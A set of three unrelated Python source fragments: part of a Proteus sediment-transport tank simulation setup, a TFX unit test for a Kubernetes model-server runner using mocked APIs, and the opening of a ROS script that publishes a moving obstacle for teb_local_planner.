    ('sigmaC',1.1,'Schmidt coefficient for turbulent diffusion'),
    ('C3e',1.2,'Dissipation coefficient '),
    ('C4e',1.0,'Dissipation coefficient'),
    ('eR', 0.8, 'Collision stress coefficient (module not functional)'),
    ('fContact', 0.05,'Contact stress coefficient'),
    ('mContact', 3.0,'Contact stress coefficient'),
    ('nContact', 5.0,'Contact stress coefficient'),
    ('angFriction', pi/6., 'Angle of friction'),
    ('vos_limiter', 0.05, 'Weak limiter for vos'),
    ('mu_fr_limiter', 100.00,'Hard limiter for contact stress friction coeff'),
    # numerical options
    ("refinement", 75.,"L[0]/refinement"),
    ("sedimentDynamics", True, "Enable sediment dynamics module"),
    ("openTop", not True, "Enable open atmosphere for air phase on the top"),
    ("cfl", 0.90 ,"Target cfl"),
    ("duration", 6.0 ,"Duration of the simulation"),
    ("PSTAB", 1.0, "Affects subgrid error"),
    ("res", 1.0e-10, "Residual tolerance"),
    ("epsFact_density", 3.0, "Control width of water/air transition zone"),
    ("epsFact_consrv_diffusion", 1.0, "Affects smoothing diffusion in mass conservation"),
    ("useRANS", 0, "Switch ON turbulence models: 0-None, 1-K-Epsilon, 2-K-Omega1998, 3-K-Omega1988"), # ns_closure: 1-classic smagorinsky, 2-dynamic smagorinsky, 3-k-epsilon, 4-k-omega
    ("sigma_k", 1.0, "sigma_k coefficient for the turbulence model"),
    ("sigma_e", 1.0, "sigma_e coefficient for the turbulence model"),
    ("Cmu", 0.09, "Cmu coefficient for the turbulence model"),
    ])
# ----- Sediment stress ----- #
# Map the sediment Context options onto the Hsu et al. two-phase
# sediment stress closure.
sedClosure = HsuSedStress(aDarcy = opts.alphaSed,
                          betaForch = opts.betaSed,
                          grain = opts.grain,
                          packFraction = opts.packFraction,
                          packMargin = opts.packMargin,
                          maxFraction = opts.maxFraction,
                          frFraction = opts.frFraction,
                          sigmaC = opts.sigmaC,
                          C3e = opts.C3e,
                          C4e = opts.C4e,
                          eR = opts.eR,
                          fContact = opts.fContact,
                          mContact = opts.mContact,
                          nContact = opts.nContact,
                          angFriction = opts.angFriction,
                          vos_limiter = opts.vos_limiter,
                          mu_fr_limiter = opts.mu_fr_limiter,
                          )
# ----- DOMAIN ----- #
domain = Domain.PlanarStraightLineGraphDomain()
# ----- Phisical constants ----- #
# Water
rho_0 = opts.rho_0
nu_0 = opts.nu_0
# Air (set equal to water values via the defaults above)
rho_1 = opts.rho_1 # 1.205 #
nu_1 = opts.nu_1 # 1.500e-5 #
# Sediment
rho_s = opts.rho_s
nu_s = 1000000
dragAlpha = 0.0
# Surface tension
sigma_01 = 0.0
# Gravity
g = opts.g
gamma_0 = abs(g[1])*rho_0
# Initial condition
waterLine_x = opts.waterLine_x
waterLine_z = opts.waterLine_z
waterLevel = waterLine_z
# ------------------------------------------------------------------ #
# Domain and mesh
# ------------------------------------------------------------------ #
L = (opts.Lx, opts.Ly)
he = L[0]/opts.refinement
dim = dimx, dimy = L
coords = [ dimx/2., dimy/2. ]
# Outward normals for each tank boundary tag.
boundaryOrientations = {'y-': np.array([0., -1.,0.]),
                        'x+': np.array([+1, 0.,0.]),
                        'y+': np.array([0., +1.,0.]),
                        'x-': np.array([-1., 0.,0.]),
                        'sponge': None,
                        }
boundaryTags = {'y-': 1,
                'x+': 2,
                'y+': 3,
                'x-': 4,
                'sponge': 5,
                }
tank = st.Rectangle(domain, dim=dim, coords=coords)
# ------------------------------------------------------------------ #
# ----- BOUNDARY CONDITIONS ----- #
# ------------------------------------------------------------------ #
# Free-slip walls on all four sides by default.
tank.BC['y-'].setFreeSlip()
tank.BC['y+'].setFreeSlip()
tank.BC['x-'].setFreeSlip()
tank.BC['x+'].setFreeSlip()
# ----- If open boundary at the top
if opts.openTop:
    tank.BC['y+'].reset()
    tank.BC['y+'].setAtmosphere()
    # Zero sediment-phase velocity/volume flux and reference pressures
    # on the open top boundary.
    tank.BC['y+'].us_dirichlet.setConstantBC(0.0)
    tank.BC['y+'].vs_dirichlet.setConstantBC(0.0)
    tank.BC['y+'].vos_advective.setConstantBC(0.0)
    tank.BC['y+'].pInc_dirichlet.setConstantBC(0.0)
    tank.BC['y+'].pInit_dirichlet.setConstantBC(0.0)
# ------------------------------------------------------------------ #
# Turbulence
# ------------------------------------------------------------------ #
if opts.useRANS:
    kInflow = 1e-6
    dissipationInflow = 1e-6
    tank.BC['x-'].setTurbulentZeroGradient()
    tank.BC['x+'].setTurbulentZeroGradient()
    tank.BC['y-'].setTurbulentZeroGradient()
    tank.BC['y+'].setTurbulentZeroGradient()
# ------------------------------------------------------------------ #
# Numerical Options and other parameters
# ------------------------------------------------------------------ #
domain.MeshOptions.he = he
# NOTE(review): the imports below duplicate imports made earlier in the
# file; kept as-is (removal is out of scope for a comment-only pass).
from math import *
from proteus import MeshTools, AuxiliaryVariables
import numpy
import proteus.MeshTools
from proteus import Domain
from proteus.Profiling import logEvent
from proteus.default_n import *
from proteus.ctransportCoefficients import smoothedHeaviside
from proteus.ctransportCoefficients import smoothedHeaviside_integral
st.assembleDomain(domain)
#----------------------------------------------------
# Time stepping and velocity
#----------------------------------------------------
T=opts.duration
weak_bc_penalty_constant = 10.0/nu_0 #100
dt_fixed = 0.001
dt_init = min(0.1*dt_fixed,0.001)
nDTout= int(round(T/dt_fixed))
runCFL = opts.cfl
sedimentDynamics=opts.sedimentDynamics
openTop=opts.openTop
#----------------------------------------------------
# Discretization -- input options
#----------------------------------------------------
genMesh = True
movingDomain = False
applyRedistancing = True
useOldPETSc = False
useSuperlu = False #True
timeDiscretization = 'be'#'vbdf'#'vbdf' # 'vbdf', 'be', 'flcbdf'
spaceOrder = 1
pspaceOrder = 1
useHex = False
useRBLES = 0.0
useMetrics = 1.0
applyCorrection = True
useVF = 1.0
useOnlyVF = False
useRANS = opts.useRANS # 0 -- None
                       # 1 -- K-Epsilon
                       # 2 -- K-Omega
KILL_PRESSURE_TERM = False
fixNullSpace_PresInc = True
INTEGRATE_BY_PARTS_DIV_U_PresInc = True
CORRECT_VELOCITY = True
STABILIZATION_TYPE = 0 #0: SUPG, 1: EV via weak residual, 2: EV via strong residual
# Input checks: fail fast on unsupported discretization options.
# BUG FIX: the original concatenated an int onto a str
# ("INVALID: spaceOrder" + spaceOrder), which raised TypeError instead of
# printing the intended diagnostic before exiting.
import sys  # harmless if already imported earlier in the file
if spaceOrder not in [1, 2]:
    print("INVALID: spaceOrder" + str(spaceOrder))
    sys.exit()
if useRBLES not in [0.0, 1.0]:
    print("INVALID: useRBLES" + str(useRBLES))
    sys.exit()
if useMetrics not in [0.0, 1.0]:
    print("INVALID: useMetrics")
    sys.exit()
# Discretization: choose finite-element basis and quadrature rules for the
# velocity (spaceOrder) and pressure (pspaceOrder) spaces, on hexes or
# simplices depending on useHex.
nd = tank.nd  # spatial dimension taken from the tank shape
if spaceOrder == 1:
    hFactor = 1.0
    if useHex:
        basis = C0_AffineLinearOnCubeWithNodalBasis
        elementQuadrature = CubeGaussQuadrature(nd, 2)
        elementBoundaryQuadrature = CubeGaussQuadrature(nd - 1, 2)
    else:
        basis = C0_AffineLinearOnSimplexWithNodalBasis
        elementQuadrature = SimplexGaussQuadrature(nd, 3)
        elementBoundaryQuadrature = SimplexGaussQuadrature(nd - 1, 3)
elif spaceOrder == 2:
    # Quadratic elements: halve the mesh-size factor and raise quadrature order.
    hFactor = 0.5
    if useHex:
        basis = C0_AffineLagrangeOnCubeWithNodalBasis
        elementQuadrature = CubeGaussQuadrature(nd, 4)
        elementBoundaryQuadrature = CubeGaussQuadrature(nd - 1, 4)
    else:
        basis = C0_AffineQuadraticOnSimplexWithNodalBasis
        elementQuadrature = SimplexGaussQuadrature(nd, 4)
        elementBoundaryQuadrature = SimplexGaussQuadrature(nd - 1, 4)
# Pressure basis.
if pspaceOrder == 1:
    if useHex:
        pbasis = C0_AffineLinearOnCubeWithNodalBasis
    else:
        pbasis = C0_AffineLinearOnSimplexWithNodalBasis
elif pspaceOrder == 2:
    if useHex:
        pbasis = C0_AffineLagrangeOnCubeWithNodalBasis
    else:
        pbasis = C0_AffineQuadraticOnSimplexWithNodalBasis
####################################################################
# Numerical parameters
####################################################################
ns_forceStrongDirichlet = False
ns_sed_forceStrongDirichlet = False
backgroundDiffusionFactor=0.01
# Shock-capturing / stabilization parameters.  With useMetrics the factors
# are tighter (0.5/0.25) and lagging is enabled; without it, looser (0.9)
# values are used and redistancing Newton is disabled.
if useMetrics:
    ns_shockCapturingFactor = 0.5
    ns_lag_shockCapturing = True
    ns_lag_subgridError = True
    ns_sed_shockCapturingFactor = 0.5
    ns_sed_lag_shockCapturing = True
    ns_sed_lag_subgridError = True
    ls_shockCapturingFactor = 0.5
    ls_lag_shockCapturing = True
    ls_sc_uref = 1.0
    ls_sc_beta = 1.0
    vof_shockCapturingFactor = 0.5
    vof_lag_shockCapturing = True
    vof_sc_uref = 1.0
    vof_sc_beta = 1.0
    vos_shockCapturingFactor = 0.9 # <-------------------------------------
    vos_lag_shockCapturing = True
    vos_sc_uref = 1.0
    vos_sc_beta = 1.0
    rd_shockCapturingFactor = 0.5
    rd_lag_shockCapturing = False
    epsFact_vos = 5.0 # <-------------------------------------
    epsFact_density = opts.epsFact_density # 1.5
    epsFact_viscosity = epsFact_curvature = epsFact_vof = epsFact_consrv_heaviside = epsFact_consrv_dirac = epsFact_density
    epsFact_redistance = 0.33
    epsFact_consrv_diffusion = opts.epsFact_consrv_diffusion # 0.1
    redist_Newton = True
    kappa_shockCapturingFactor = 0.25
    kappa_lag_shockCapturing = True #False
    kappa_sc_uref = 1.0
    kappa_sc_beta = 1.0
    dissipation_shockCapturingFactor = 0.25
    dissipation_lag_shockCapturing = True #False
    dissipation_sc_uref = 1.0
    dissipation_sc_beta = 1.0
else:
    ns_shockCapturingFactor = 0.9
    ns_lag_shockCapturing = True
    ns_lag_subgridError = True
    ns_sed_shockCapturingFactor = 0.9
    ns_sed_lag_shockCapturing = True
    ns_sed_lag_subgridError = True
    ls_shockCapturingFactor = 0.9
    ls_lag_shockCapturing = True
    ls_sc_uref = 1.0
    ls_sc_beta = 1.0
    vof_shockCapturingFactor = 0.9
    vof_lag_shockCapturing = True
    vof_sc_uref = 1.0
    vof_sc_beta = 1.0
    vos_shockCapturingFactor = 0.9
    vos_lag_shockCapturing = True
    vos_sc_uref = 1.0
    vos_sc_beta = 1.0
    rd_shockCapturingFactor = 0.9
    rd_lag_shockCapturing = False
    epsFact_density = opts.epsFact_density # 1.5
    epsFact_viscosity = epsFact_curvature = epsFact_vof = epsFact_vos = epsFact_consrv_heaviside = epsFact_consrv_dirac = epsFact_density
    epsFact_redistance = 0.33
    epsFact_consrv_diffusion = opts.epsFact_consrv_diffusion # 1.0
    redist_Newton = False
    kappa_shockCapturingFactor = 0.9
    kappa_lag_shockCapturing = True #False
    kappa_sc_uref = 1.0
    kappa_sc_beta = 1.0
    dissipation_shockCapturingFactor = 0.9
    dissipation_lag_shockCapturing = True #False
    dissipation_sc_uref = 1.0
    dissipation_sc_beta = 1.0
# Nonlinear solver absolute tolerances, scaled by mesh size he and floored
# by the user-supplied opts.res.
ns_nl_atol_res = max(opts.res, 0.001 * he ** 2)
ns_sed_nl_atol_res = max(opts.res, 0.001 * he ** 2)
vof_nl_atol_res = max(opts.res, 0.001 * he ** 2)
vos_nl_atol_res = max(opts.res, 0.001 * he ** 2)
ls_nl_atol_res = max(opts.res, 0.001 * he ** 2)
rd_nl_atol_res = max(opts.res, 0.005 * he)
mcorr_nl_atol_res = max(opts.res, 0.001 * he ** 2)
kappa_nl_atol_res = max(opts.res, 0.001 * he ** 2)
dissipation_nl_atol_res = max(opts.res, 0.001 * he ** 2)
phi_nl_atol_res = max(opts.res, 0.001 * he ** 2)
pressure_nl_atol_res = max(opts.res, 0.001 * he ** 2)
####################################################################
# Turbulence closure selection
####################################################################
ns_closure = 0 #1-classic smagorinsky, 2-dynamic smagorinsky, 3 -- k-epsilon, 4 -- k-omega
ns_sed_closure = 0 #1-classic smagorinsky, 2-dynamic smagorinsky, 3 -- k-epsilon, 4 -- k-omega
if useRANS == 1:
    ns_closure = 3
elif useRANS == 2:
    # BUG FIX: this was 'ns_closure == 4', a no-op comparison, so the
    # k-omega closure was never actually selected.
    ns_closure = 4
####################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
# Functions for model variables - Initial conditions
####################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
def signedDistance(x):
    """Signed vertical distance of point ``x`` from the still-water level
    ``waterLine_z`` (positive above the water line, negative below)."""
    return x[1] - waterLine_z
def vos_signedDistance(x):
    """Signed vertical distance of ``x`` from 75% of the still-water level
    (positive above, negative below)."""
    return x[1] - 0.75 * waterLine_z
class Suspension_class:
    """Initial-condition functor for the sediment volume fraction.

    ``uOfXT`` returns ``opts.cSed`` inside a rectangular sediment region —
    below the (shifted) water line, above y = 0.05, and between x = 0.8 and
    x = dimx - 0.8 — with smoothed-Heaviside transitions of half-width
    ``smoothing`` across every edge, and a near-zero background value
    (1e-10) everywhere else.
    """
    def __init__(self):
        pass
    def uOfXT(self, x, t=0):
        # Signed distances to the four edges of the sediment region.
        phi = signedDistance(x) + 0.1      # top edge: water line shifted up 0.1
        phiBottom = x[1] - 0.05            # bottom edge
        phiLeft = x[0] - 0.8               # left edge
        phiRight = x[0] - (dimx-0.8)       # right edge
        # Transition half-width tied to the mesh size.
        smoothing = (epsFact_consrv_heaviside)*he/2.
        Heav = smoothedHeaviside(smoothing, phi)
        HeavBottom = smoothedHeaviside(smoothing, phiBottom)
        HeavLeft = smoothedHeaviside(smoothing, phiLeft)
        HeavRight = smoothedHeaviside(smoothing, phiRight)
        # Case 1: strictly inside in x — decide by vertical position only.
        if phiLeft>=smoothing and phiRight<=-smoothing:
            if phi <= -smoothing:
                if phiBottom >= smoothing:
                    return opts.cSed          # fully inside the region
                elif -smoothing < phiBottom < smoothing :
                    return opts.cSed * (HeavBottom)  # bottom transition band
                else:
                    return 1e-10
            elif -smoothing < phi < smoothing:
                return opts.cSed * (1.-Heav)          # top transition band
            else:
                return 1e-10
        # Case 2: within the left-edge transition band.
        elif -smoothing < phiLeft < smoothing:
            if phi <= 0.0 and phiBottom >= 0.0:
                return opts.cSed * (HeavLeft)
            elif 0. < phi < smoothing:
                return opts.cSed * (1.-Heav)
            elif 0. > phiBottom > -smoothing:
                return opts.cSed * (HeavBottom)
            else:
                return 1e-10
        # Case 3: within the right-edge transition band.
        elif -smoothing < phiRight < smoothing:
            if phi <= 0.0 and phiBottom >= 0.0:
                return opts.cSed * (1.-HeavRight)
            elif 0. < phi < smoothing:
                return opts.cSed * (1.-Heav)
            elif 0. > phiBottom > -smoothing:
                return opts.cSed * (HeavBottom)
            else:
                return 1e-10
        # Outside the region in x: background value.
        else:
            return 1e-10
def vos_function(x, t=0):
    # NOTE(review): this is a line-for-line duplicate of
    # Suspension_class.uOfXT above — consider delegating to it to avoid the
    # two copies drifting apart.
    # Signed distances to the four edges of the sediment region.
    phi = signedDistance(x) + 0.1      # top edge: water line shifted up 0.1
    phiBottom = x[1] - 0.05            # bottom edge
    phiLeft = x[0] - 0.8               # left edge
    phiRight = x[0] - (dimx-0.8)       # right edge
    # Transition half-width tied to the mesh size.
    smoothing = (epsFact_consrv_heaviside)*he/2.
    Heav = smoothedHeaviside(smoothing, phi)
    HeavBottom = smoothedHeaviside(smoothing, phiBottom)
    HeavLeft = smoothedHeaviside(smoothing, phiLeft)
    HeavRight = smoothedHeaviside(smoothing, phiRight)
    # Case 1: strictly inside in x — decide by vertical position only.
    if phiLeft>=smoothing and phiRight<=-smoothing:
        if phi <= -smoothing:
            if phiBottom >= smoothing:
                return opts.cSed          # fully inside the region
            elif -smoothing < phiBottom < smoothing :
                return opts.cSed * (HeavBottom)  # bottom transition band
            else:
                return 1e-10
        elif -smoothing < phi < smoothing:
            return opts.cSed * (1.-Heav)          # top transition band
        else:
            return 1e-10
    # Case 2: within the left-edge transition band.
    elif -smoothing < phiLeft < smoothing:
        if phi <= 0.0 and phiBottom >= 0.0:
            return opts.cSed * (HeavLeft)
        elif 0. < phi < smoothing:
            return opts.cSed * (1.-Heav)
        elif 0. > phiBottom > -smoothing:
            return opts.cSed * (HeavBottom)
        else:
            return 1e-10
    # Case 3: within the right-edge transition band.
    elif -smoothing < phiRight < smoothing:
        if phi <= 0.0 and phiBottom >= 0.0:
            return opts.cSed * (1.-HeavRight)
        elif 0. < phi < smoothing:
            return opts.cSed * (1.-Heav)
        elif 0. > phiBottom > -smoothing:
            return opts.cSed * (HeavBottom)
        else:
            return 1e-10
    # Outside the region in x: background value.
    else:
        return 1e-10
Suspension = Suspension_class()
|
<filename>tfx/components/infra_validator/model_server_runners/kubernetes_runner_test.py
# Lint as: python2, python3
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tfx.components.infra_validator.model_server_runners.kubernetes_runner."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from typing import Any, Dict, Text
from kubernetes import client as k8s_client
from kubernetes.client import rest
import mock
import tensorflow as tf
from google.protobuf import json_format
from tfx.components.infra_validator import error_types
from tfx.components.infra_validator import serving_bins
from tfx.components.infra_validator.model_server_runners import kubernetes_runner
from tfx.proto import infra_validator_pb2
from tfx.types import standard_artifacts
from tfx.utils import kube_utils
from tfx.utils import path_utils
def _create_serving_spec(payload: Dict[Text, Any]):
  """Build a ServingSpec proto from a plain dict payload."""
  spec = infra_validator_pb2.ServingSpec()
  json_format.ParseDict(payload, spec)
  return spec
class KubernetesRunnerTest(tf.test.TestCase):
  """Tests for KubernetesRunner with kube_utils and the k8s API mocked out."""

  def setUp(self):
    super(KubernetesRunnerTest, self).setUp()
    # Stop every mock.patch started in setUp or in the _Assume* helpers.
    self.addCleanup(mock.patch.stopall)
    self._base_dir = os.path.join(
        os.path.dirname(  # components/
            os.path.dirname(  # infra_validator/
                os.path.dirname(__file__))),  # model_server_runners/
        'testdata'
    )
    self._model = standard_artifacts.Model()
    self._model.uri = os.path.join(self._base_dir, 'trainer', 'current')
    self._model_name = 'chicago-taxi'
    # Prepare mocks
    self._mock_sleep = mock.patch('time.sleep').start()
    self._mock_core_v1_api = mock.patch.object(
        kube_utils, 'make_core_v1_api').start().return_value

  def _CreateKubernetesRunner(self, k8s_config_dict=None):
    """Build a KubernetesRunner for TF Serving with optional k8s overrides."""
    self._serving_spec = infra_validator_pb2.ServingSpec()
    json_format.ParseDict({
        'tensorflow_serving': {
            'tags': ['1.15.0']},
        'kubernetes': k8s_config_dict or {},
        'model_name': self._model_name,
    }, self._serving_spec)
    serving_binary = serving_bins.parse_serving_binaries(self._serving_spec)[0]
    return kubernetes_runner.KubernetesRunner(
        model_path=path_utils.serving_model_path(self._model.uri),
        serving_binary=serving_binary,
        serving_spec=self._serving_spec)

  def _AssumeInsideKfp(
      self,
      namespace='my-namespace',
      pod_name='my-pod-name',
      pod_uid='my-pod-uid',
      pod_service_account_name='my-service-account-name',
      with_pvc=False):
    """Patch kube_utils so the runner believes it executes inside a KFP pod."""
    pod = k8s_client.V1Pod(
        api_version='v1',
        kind='Pod',
        metadata=k8s_client.V1ObjectMeta(
            name=pod_name,
            uid=pod_uid,
        ),
        spec=k8s_client.V1PodSpec(
            containers=[
                k8s_client.V1Container(
                    name='main',
                    volume_mounts=[]),
            ],
            volumes=[]))
    if with_pvc:
      # Mount a PVC-backed volume at the testdata directory so the runner can
      # reuse it for the model path.
      pod.spec.volumes.append(
          k8s_client.V1Volume(
              name='my-volume',
              persistent_volume_claim=k8s_client
              .V1PersistentVolumeClaimVolumeSource(
                  claim_name='my-pvc')))
      pod.spec.containers[0].volume_mounts.append(
          k8s_client.V1VolumeMount(
              name='my-volume',
              mount_path=self._base_dir))
    mock.patch.object(kube_utils, 'is_inside_kfp', return_value=True).start()
    pod.spec.service_account_name = pod_service_account_name
    mock.patch.object(kube_utils, 'get_current_kfp_pod',
                      return_value=pod).start()
    mock.patch.object(kube_utils, 'get_kfp_namespace',
                      return_value=namespace).start()
    if with_pvc:
      (self._mock_core_v1_api.read_namespaced_persistent_volume_claim
       .return_value) = k8s_client.V1PersistentVolumeClaim(
           metadata=k8s_client.V1ObjectMeta(
               name='my-pvc'),
           spec=k8s_client.V1PersistentVolumeClaimSpec(
               access_modes=['ReadWriteMany']))

  def _AssumeOutsideKfp(self):
    """Patch kube_utils so the runner believes it is NOT inside a KFP pod."""
    mock.patch.object(kube_utils, 'is_inside_kfp', return_value=False).start()

  def testStart_InsideKfp(self):
    """Start() creates a pod in the detected KFP namespace."""
    # Prepare mocks and variables.
    self._AssumeInsideKfp(namespace='vanilla-latte')
    runner = self._CreateKubernetesRunner()
    # Act.
    runner.Start()
    # Check states.
    self._mock_core_v1_api.create_namespaced_pod.assert_called()
    _, kwargs = self._mock_core_v1_api.create_namespaced_pod.call_args
    self.assertEqual(kwargs['namespace'], 'vanilla-latte')
    self.assertTrue(runner._pod_name)

  def testBuildPodManifest_InsideKfp(self):
    """The pod manifest inherits owner refs and service account from KFP."""
    # Prepare mocks and variables.
    self._AssumeInsideKfp(
        namespace='strawberry-latte',
        pod_name='green-tea-latte',
        pod_uid='chocolate-latte',
        # BUG FIX: this value had been corrupted to 'van<PASSWORD>' by an
        # anonymization pass; the assertion below expects 'vanilla-latte'.
        pod_service_account_name='vanilla-latte')
    runner = self._CreateKubernetesRunner()
    # Act.
    pod_manifest = runner._BuildPodManifest()
    # Check result.
    self.assertEqual(
        pod_manifest.metadata.generate_name, 'tfx-infraval-modelserver-')
    self.assertEqual(pod_manifest.metadata.labels, {
        'app': 'tfx-infraval-modelserver'
    })
    owner_ref = pod_manifest.metadata.owner_references[0]
    self.assertEqual(owner_ref.name, 'green-tea-latte')
    self.assertEqual(owner_ref.uid, 'chocolate-latte')
    self.assertEqual(pod_manifest.spec.service_account_name, 'vanilla-latte')
    self.assertEqual(pod_manifest.spec.restart_policy, 'Never')
    container = pod_manifest.spec.containers[0]
    self.assertEqual(container.name, 'model-server')
    self.assertEqual(container.image, 'tensorflow/serving:1.15.0')
    container_envs = {env.name for env in container.env}
    self.assertIn('MODEL_NAME', container_envs)
    self.assertIn('MODEL_BASE_PATH', container_envs)

  def testBuildPodManifest_InsideKfp_WithPvc(self):
    """A PVC mounted over the model path is propagated into the manifest."""
    # Prepare mocks and variables.
    self._AssumeInsideKfp(with_pvc=True)
    runner = self._CreateKubernetesRunner()
    # Act.
    pod_manifest = runner._BuildPodManifest()
    # Check Volume.
    volume = pod_manifest.spec.volumes[0]
    self.assertEqual(volume.name, 'model-volume')
    self.assertEqual(volume.persistent_volume_claim.claim_name, 'my-pvc')
    # Check VolumeMount.
    container = pod_manifest.spec.containers[0]
    volume_mount = container.volume_mounts[0]
    self.assertEqual(volume_mount.name, 'model-volume')
    self.assertEqual(volume_mount.mount_path, self._base_dir)

  def testBuildPodManifest_InsideKfp_OverrideConfig(self):
    """Explicit KubernetesConfig values override the KFP-derived defaults."""
    # Prepare mocks and variables.
    self._AssumeInsideKfp()
    runner = self._CreateKubernetesRunner(k8s_config_dict={
        'service_account_name': 'chocolate-latte',
        'active_deadline_seconds': 123,
    })
    # Act.
    pod_manifest = runner._BuildPodManifest()
    # Check result.
    self.assertEqual(pod_manifest.spec.service_account_name, 'chocolate-latte')
    self.assertEqual(pod_manifest.spec.active_deadline_seconds, 123)

  def testStart_FailsIfOutsideKfp(self):
    """Constructing the runner outside KFP is not supported."""
    # Prepare mocks and variables.
    self._AssumeOutsideKfp()
    # Act.
    with self.assertRaises(NotImplementedError):
      self._CreateKubernetesRunner()

  def testStart_FailsIfStartedTwice(self):
    """A second Start() on the same runner is rejected."""
    # Prepare mocks and variables.
    self._AssumeInsideKfp()
    runner = self._CreateKubernetesRunner()
    # Act.
    runner.Start()
    with self.assertRaises(AssertionError):
      runner.Start()

  @mock.patch('time.time')
  def testWaitUntilRunning(self, mock_time):
    """WaitUntilRunning polls until the pod phase becomes Running."""
    # Prepare mocks and variables.
    self._AssumeInsideKfp()
    runner = self._CreateKubernetesRunner()
    mock_time.side_effect = list(range(20))
    pending_pod = mock.Mock()
    pending_pod.status.phase = 'Pending'
    running_pod = mock.Mock()
    running_pod.status.phase = 'Running'
    self._mock_core_v1_api.read_namespaced_pod.side_effect = [
        rest.ApiException('meh'),  # Error is tolerable.
        pending_pod,
        pending_pod,
        running_pod
    ]
    # Act.
    runner.Start()
    try:
      runner.WaitUntilRunning(deadline=10)
    except Exception as e:  # pylint: disable=broad-except
      self.fail(e)
    # Check calls.
    self.assertEqual(self._mock_core_v1_api.read_namespaced_pod.call_count, 4)

  def testWaitUntilRunning_FailsIfNotStarted(self):
    """WaitUntilRunning before Start() is a usage error."""
    # Prepare mocks and variables.
    self._AssumeInsideKfp()
    runner = self._CreateKubernetesRunner()
    # Act.
    with self.assertRaises(AssertionError):
      runner.WaitUntilRunning(deadline=10)

  @mock.patch('time.time')
  def testWaitUntilRunning_FailsIfJobAborted(self, mock_time):
    """A pod that terminates before reaching Running raises JobAborted."""
    # Prepare mocks and variables.
    self._AssumeInsideKfp()
    runner = self._CreateKubernetesRunner()
    mock_time.side_effect = list(range(20))
    terminated_pod = mock.Mock()
    terminated_pod.status.phase = 'Succeeded'
    self._mock_core_v1_api.read_namespaced_pod.return_value = terminated_pod
    # Act.
    runner.Start()
    with self.assertRaises(error_types.JobAborted):
      runner.WaitUntilRunning(deadline=10)

  @mock.patch('time.time')
  def testWaitUntilRunning_FailsIfDeadlineExceeded(self, mock_time):
    """A pod stuck in Pending past the deadline raises DeadlineExceeded."""
    # Prepare mocks and variables.
    self._AssumeInsideKfp()
    runner = self._CreateKubernetesRunner()
    mock_time.side_effect = list(range(20))
    pending_pod = mock.Mock()
    pending_pod.status.phase = 'Pending'
    self._mock_core_v1_api.read_namespaced_pod.return_value = pending_pod
    # Act.
    runner.Start()
    with self.assertRaises(error_types.DeadlineExceeded):
      runner.WaitUntilRunning(deadline=10)

  def testStop(self):
    """Stop() deletes the pod it started."""
    # Prepare mocks and variables.
    self._AssumeInsideKfp()
    runner = self._CreateKubernetesRunner()
    # Act.
    try:
      runner.Start()
      runner.Stop()
    except Exception as e:  # pylint: disable=broad-except
      self.fail(e)
    # Check calls.
    self._mock_core_v1_api.delete_namespaced_pod.assert_called_once()

  def testStop_RetryIfApiException(self):
    """Stop() retries the delete call (with sleeps) on ApiException."""
    # Prepare mocks and variables.
    self._AssumeInsideKfp()
    runner = self._CreateKubernetesRunner()
    self._mock_core_v1_api.delete_namespaced_pod.side_effect = rest.ApiException
    # Act.
    try:
      runner.Start()
      runner.Stop()
    except Exception as e:  # pylint: disable=broad-except
      self.fail(e)
    # Check calls.
    self.assertEqual(self._mock_sleep.call_count, 4)
    self.assertEqual(self._mock_core_v1_api.delete_namespaced_pod.call_count, 5)
# Standard TensorFlow test entry point.
if __name__ == '__main__':
  tf.test.main()
|
<reponame>FranzAlbers/teb_local_planner
#!/usr/bin/env python
# Author: <EMAIL>
import rospy, math, tf
from teb_local_planner.msg import ObstacleMsg
from geometry_msgs.msg import PolygonStamped, Point32, QuaternionStamped, Quaternion, TwistWithCovariance
from tf.transformations import quaternion_from_euler
def publish_obstacle_msg():
  """Publish a single dynamic point obstacle for the teb_local_planner.

  Builds an ObstacleMsg with one point obstacle moving vertically with
  velocity (vel_x, vel_y) and publishes it at 10 Hz, wrapping the y
  position within ``range_y``.  Line/polygon obstacle examples are kept
  below as commented-out templates.
  """
  pub = rospy.Publisher('/test_optim_node/obstacles', ObstacleMsg, queue_size=1)
  #pub = rospy.Publisher('/p3dx/move_base/TebLocalPlannerROS/obstacles', ObstacleMsg, queue_size=1)
  rospy.init_node("test_obstacle_msg")
  y_0 = -3.0        # initial y position of the obstacle
  vel_x = 0.0       # obstacle velocity, x component
  vel_y = 0.3       # obstacle velocity, y component
  range_y = 6.0     # y excursion before the motion wraps around
  obstacle_msg = ObstacleMsg()
  obstacle_msg.header.stamp = rospy.Time.now()
  obstacle_msg.header.frame_id = "map" # CHANGE HERE: odom/map
  # Add point obstacle
  obstacle_msg.obstacles.append(PolygonStamped())
  obstacle_msg.obstacles[0].polygon.points = [Point32()]
  obstacle_msg.obstacles[0].polygon.points[0].x = -1.5
  obstacle_msg.obstacles[0].polygon.points[0].y = 0
  obstacle_msg.obstacles[0].polygon.points[0].z = 0
  # Orientation aligned with the velocity vector.
  yaw = math.atan2(vel_y, vel_x)
  q = tf.transformations.quaternion_from_euler(0,0,yaw)
  quat = Quaternion(*q)
  obstacle_msg.orientations.append(QuaternionStamped())
  obstacle_msg.orientations[0].header.stamp = obstacle_msg.header.stamp
  obstacle_msg.orientations[0].header.frame_id = obstacle_msg.header.frame_id
  obstacle_msg.orientations[0].quaternion = quat
  # Constant linear velocity, no angular velocity.
  obstacle_msg.velocities.append(TwistWithCovariance())
  obstacle_msg.velocities[0].twist.linear.x = vel_x
  obstacle_msg.velocities[0].twist.linear.y = vel_y
  obstacle_msg.velocities[0].twist.linear.z = 0
  obstacle_msg.velocities[0].twist.angular.x = 0
  obstacle_msg.velocities[0].twist.angular.y = 0
  obstacle_msg.velocities[0].twist.angular.z = 0
  # Add line obstacle
  #obstacle_msg.obstacles.append(PolygonStamped())
  #line_start = Point32()
  #line_start.x = -2.5
  #line_start.y = 0.5
  #line_start.y = -3
  #line_end = Point32()
  #line_end.x = -2.5
